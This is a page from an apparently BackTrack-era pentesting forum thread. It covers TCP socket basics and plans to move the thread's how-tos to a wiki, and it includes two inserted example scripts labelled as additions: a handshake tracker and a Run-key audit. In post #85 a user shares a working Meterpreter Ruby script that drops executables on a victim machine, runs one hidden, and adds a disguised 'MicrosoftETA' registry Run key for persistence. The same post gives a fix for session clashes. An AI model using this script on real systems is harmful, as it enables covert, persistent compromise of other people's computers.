Page 9 of 13 (Results 81 to 90 of 123)

Thread: Pentesting Documentation

  1. #81 lupin (Super Moderator, joined Jan 2010, 2,943 posts)

    I like the pictures. Funny. Is that a monkey head on the client?


    I don't know much about Java sockets, not being a Java programmer, but the description on that page about sockets does not describe the way sockets are normally created over TCP, for example between a web server and client.

    An example:

    A web server listens on TCP port 80.

    A client, wanting to make a request to the server, picks a local client TCP port number (say 1198) and sends a TCP segment with the SYN flag set from that source port to the web server on destination port 80. (So the client port is chosen by the client before its first communication.)

    The server responds with a TCP segment to destination port 1198, source port 80, with the SYN and ACK flags set. The client then sends a segment with the ACK flag set from TCP source port 1198 to TCP destination port 80. The three-way handshake is now complete and the systems have a socket to communicate over, using the given ports.

    Neither the server nor the client will change their port numbers during this conversation; all communication in this socket goes between TCP ports 1198 and 80. The combination of the two IP addresses and two TCP port numbers from the server and client uniquely identifies the socket, to keep it separate from other sockets running over port 80 on the same web server. The server or client can use that socket to create new sockets for communication (like the Unix portmapper, FTP servers, etc.), but TCP itself does not require it, and most client/server applications just use regular TCP sockets as described above.

    You can confirm this by performing a packet capture between a web server and client.

    It's possible that the link you provided meant something else by the word "port", but in terms of TCP ports (and UDP ports as well, by the way), it's not correct.

    Capitalisation is important. It's the difference between "Helping your brother Jack off a horse" and "Helping your brother jack off a horse".

    The Forum Rules, Forum FAQ and the BackTrack Wiki... learn them, love them, live them.
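The handshake and port bookkeeping lupin describes, as an added example that is not part of the thread: a small Ruby tracker that walks a constructed list of TCP segments (addresses, ports and flags are made up, not from a real capture), keys every conversation on its two IP/port pairs, and advances each one through SYN, SYN/ACK and ACK. The segment hashes and the `socket_key` and `track_handshakes` names are assumptions of this example, standing in for what a packet capture tool would show.

```ruby
# Added example (not from the thread): a minimal TCP three-way-handshake
# tracker keyed on the 4-tuple (client IP, client port, server IP, server port).

# Constructed segments standing in for captured packets. Flags are a sorted
# array of symbols, e.g. [:syn] or [:ack, :syn].
SEGMENTS = [
  { src: "10.0.0.5",  sport: 1198, dst: "10.0.0.80", dport: 80,   flags: [:syn] },
  { src: "10.0.0.80", sport: 80,   dst: "10.0.0.5",  dport: 1198, flags: [:ack, :syn] },
  { src: "10.0.0.5",  sport: 1198, dst: "10.0.0.80", dport: 80,   flags: [:ack] },
  # a second client socket to the same server port, interleaved with the first
  { src: "10.0.0.5",  sport: 1199, dst: "10.0.0.80", dport: 80,   flags: [:syn] },
  { src: "10.0.0.80", sport: 80,   dst: "10.0.0.5",  dport: 1199, flags: [:ack, :syn] },
  # data after the handshake keeps exactly the same ports
  { src: "10.0.0.5",  sport: 1198, dst: "10.0.0.80", dport: 80,   flags: [:ack, :psh] },
]

# Direction-independent socket identifier: the two endpoints, sorted so that
# client->server and server->client segments map to the same key.
def socket_key(seg)
  [[seg[:src], seg[:sport]], [seg[:dst], seg[:dport]]].sort
end

# Walk the segments in order and advance a per-socket state machine:
#   (none) -> :syn_sent -> :syn_received -> :established
# Anything that does not fit the expected next step leaves the state alone.
def track_handshakes(segments)
  states = {}
  segments.each do |seg|
    key = socket_key(seg)
    f = seg[:flags]
    case states[key]
    when nil
      states[key] = :syn_sent if f == [:syn]
    when :syn_sent
      states[key] = :syn_received if f.include?(:syn) && f.include?(:ack)
    when :syn_received
      states[key] = :established if f.include?(:ack) && !f.include?(:syn)
    end
  end
  states
end

if __FILE__ == $PROGRAM_NAME
  track_handshakes(SEGMENTS).each { |key, state| puts "#{key.inspect} => #{state}" }
end
```

Two sockets to the same server port stay separate because the client port differs, and the data segment at the end lands on the first socket without changing any port, which is the behaviour lupin says a capture will confirm.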

  2. #82 AnActivist (Junior Member, joined Apr 2009, 77 posts)

    Shoot, how embarrassing. Well, I found this quote from the website; perhaps you are correct that the below example is Java specific?
    The Java environment is highly regarded in part because of its suitability for writing programs that use and interact with the resources on the Internet and the World Wide Web. In fact, Java-capable browsers use this ability of the Java environment to the extreme to transport and run applets over the net.
    Edit: I'm reading up on sockets over TCP, so I'll be back with some more accurate information, and perhaps better pictures.

  3. #83 (poster name not captured)

    Nice work.

    Well done and thank you for posting and sharing. I enjoyed following the post.
    Looking forward to more.
    15" MBP 8 gigs o ram 256 gig SSD in drivebay + 256 gig 5400 HD
    1000HE EEE 30 gig SSD 2 gigs Ram

  4. #84 lupin (Super Moderator, joined Jan 2010, 2,943 posts)

    Quote Originally Posted by AnActivist:
    so I'll be back with some more accurate information, and perhaps better pictures

    OK, but keep the monkey head, it gives the pictures character.

  5. #85 AnActivist (Junior Member, joined Apr 2009, 77 posts)

    A while ago BigMac uploaded a very interesting video where he uses windows/meterpreter/reverse_tcp payloads that have been converted into executables, along with a nifty Ruby script, to produce some very interesting results. To make a long story short, a payload/executable is executed on the victim's computer, which then sends a meterpreter session back to the attacker but also executes this script:
    Code:
    print_status("Creating directory")
    client.fs.dir.mkdir("c:\\system")
    client.fs.dir.mkdir("c:\\system\\windows")
    client.fs.file.upload_file("c:\\system\\windows\\wingrab.exe" , "/root/Desktop/Exploits/Project/wingrab.exe")
    client.fs.file.upload_file("c:\\system\\windows\\winview.exe" , "/root/Desktop/Exploits/Project/winview.exe")
    client.sys.process.execute("c:\\system\\windows\\wingrab.exe", nil, {'Hidden' => 'true'})
    
    key = "HKLM\\software\\microsoft\\windows\\currentversion\\run"
    value = "MicrosoftETA"
    data = "c:\\system\\windows\\wingrab.exe"
    type = "REG_SZ"
    root_key, base_key = client.sys.registry.splitkey(key)
    open_key = client.sys.registry.open_key(root_key, base_key, KEY_WRITE)
    open_key.set_value(value, client.sys.registry.type2str(type), data)
    print_line("Successful")
    Basically this adds another payload/executable to the registry so that every time the victim starts their computer this payload is executed. For some reason, starting a couple of weeks ago, the script started to cause the meterpreter sessions to get in the way of each other, and now the script doesn't produce the right results anymore. HDM helped me fix this problem with only two lines of code; however, a couple of days ago my BT3 VMware image got corrupted and I lost all my data. Now I can't remember how HDM did it, but I figured out a way to solve the problem a little bit less elegantly.
    To keep the meterpreter sessions from getting hung up and re-running the above script, just add the following lines to the beginning and end:
    NOTE: Watch BigMac's video if any of this is confusing, or check out some other tutorials. This isn't really a how-to, more like a contribution to other people's work; that being said, a lot of the file names/directories could be different.
    Code:
    id = client.sys.process['wingrab.exe']
    if (id == nil)
    ....code from above....
    end
    This should fix the problem. When I have more time I'm going to rewrite this post so that it makes a little bit more sense. I just thought I would throw it out there to see if anyone else is having this issue of the sessions getting hung up without my addition. Hope this helps someone. Thanks for reading.

    *KMDave I'd like to try and recreate the above problem with someone else. PM me if you want to try it out.
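From the defender's side, the Run key the script above writes to is exactly where an autostart review looks. The following is an added example, not from the thread and not Metasploit code: a Ruby check over a constructed sample of Run values (the entries are made up, with the page's `MicrosoftETA` value among them) that flags executables launched from outside the usual Windows and Program Files directories. `TRUSTED_DIRS`, `executable_path` and `suspicious_run_entries` are names chosen for this example, and the sample would in practice be replaced by the output of an export of that key.

```ruby
# Added example (not from the thread): reviewing entries under
# HKLM\software\microsoft\windows\currentversion\run and flagging values
# whose executable lives outside the usual install directories.

# Constructed sample of what an export of that key might list:
# value name => command line. The "MicrosoftETA" entry mirrors the script above.
SAMPLE_RUN_VALUES = {
  "SecurityHealth"      => '%windir%\\system32\\SecurityHealthSystray.exe',
  "VMware User Process" => '"C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe" -n vmusr',
  "MicrosoftETA"        => 'c:\\system\\windows\\wingrab.exe',
}

# Directories from which autostart executables are normally expected
# (assumed allowlist for this example; extend it per environment).
TRUSTED_DIRS = [
  'c:\\windows\\',
  'c:\\program files\\',
  'c:\\program files (x86)\\',
]

# Extract the executable path from a Run value: a quoted path, or the first
# whitespace-delimited token. Lower-cased, with %windir% / %systemroot%
# expanded so it can be compared against TRUSTED_DIRS. Block form of sub is
# used so backslashes in the replacement are taken literally.
def executable_path(command)
  path = if command.start_with?('"')
           command[1...command.index('"', 1)]
         else
           command.split(/\s+/).first
         end
  path.downcase
      .sub('%windir%') { 'c:\\windows' }
      .sub('%systemroot%') { 'c:\\windows' }
end

# Return the value names whose executable is outside every trusted directory.
def suspicious_run_entries(values)
  values.select do |_name, cmd|
    path = executable_path(cmd)
    TRUSTED_DIRS.none? { |dir| path.start_with?(dir) }
  end.keys
end

if __FILE__ == $PROGRAM_NAME
  suspicious_run_entries(SAMPLE_RUN_VALUES).each do |name|
    puts "suspicious autostart: #{name} => #{SAMPLE_RUN_VALUES[name]}"
  end
end
```

A path-based allowlist is deliberately crude: a real review would also compare value names against known software and check the file's signature, but a binary started from a directory nobody installs software into (c:\system\windows here) is the cheapest signal, and it is what the script's own choice of location gives away.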

  6. #86 thorin (My life is this forum, joined Jan 2010, 2,629 posts)

    Quote Originally Posted by thorin:
    I think others would appreciate what you've done here. Maybe it should be wiki'fied? http://backtrack.offensive-security.....php/Main_Page

    Anyone else in agreement?

    Personally I think the popularity of the thread is evidence enough, but let's get some feedback. I don't want to make AnActivist do any more work than the community is interested in.
    I'm a compulsive post editor, you might wanna wait until my post has been online for 5-10 mins before quoting it as it will likely change.

    I know I seem harsh in some of my replies. SORRY! But if you're doing something illegal or posting something that seems to be obvious BS I'm going to call you on it.

  7. #87 (Junior Member, joined Mar 2009, 83 posts)

    Quote Originally Posted by thorin:
    Anyone else in agreement?

    Personally I think the popularity of the thread is evidence enough, but let's get some feedback. I don't want to make AnActivist do any more work than the community is interested in.

    100% agreed! Wiki this beast!

  8. #88 Archangel-Amael (Super Moderator, Location: Somewhere, joined Jan 2010, 8,012 posts)

    Quote Originally Posted by thorin:
    Anyone else in agreement?

    Personally I think the popularity of the thread is evidence enough, but let's get some feedback. I don't want to make AnActivist do any more work than the community is interested in.

    I agree it should be on the wiki.
    To be successful here you should read all of the following.
    ForumRules
    ForumFAQ
    If you are new to Back|Track
    Back|Track Wiki
    Failure to do so will probably get your threads deleted or worse.

  9. #89 lupin (Super Moderator, joined Jan 2010, 2,943 posts)

    Quote Originally Posted by thorin:
    Anyone else in agreement?

    Personally I think the popularity of the thread is evidence enough, but let's get some feedback. I don't want to make AnActivist do any more work than the community is interested in.

    Sounds good to me, there's certainly some interesting and useful information here. I assume though that the process of transferring the content to the wiki would require some re-editing and re-formatting (from "post" format to "wiki" format), and pruning of off-topic posts (e.g. the whole ethics discussion), which I'm guessing would need to be done by AnActivist, so let's hear what he has to say on the matter.

    AnActivist?

  10. #90 AnActivist (Junior Member, joined Apr 2009, 77 posts)

    Because of a PM from thorin a couple of weeks ago, I said that if there was interest I would absolutely post the information I have accumulated to the wiki. I'm honored to give back to the community. I'll get started figuring out how to add the reformatted HowTos to the wiki right away. Thank you everyone for the recognition.
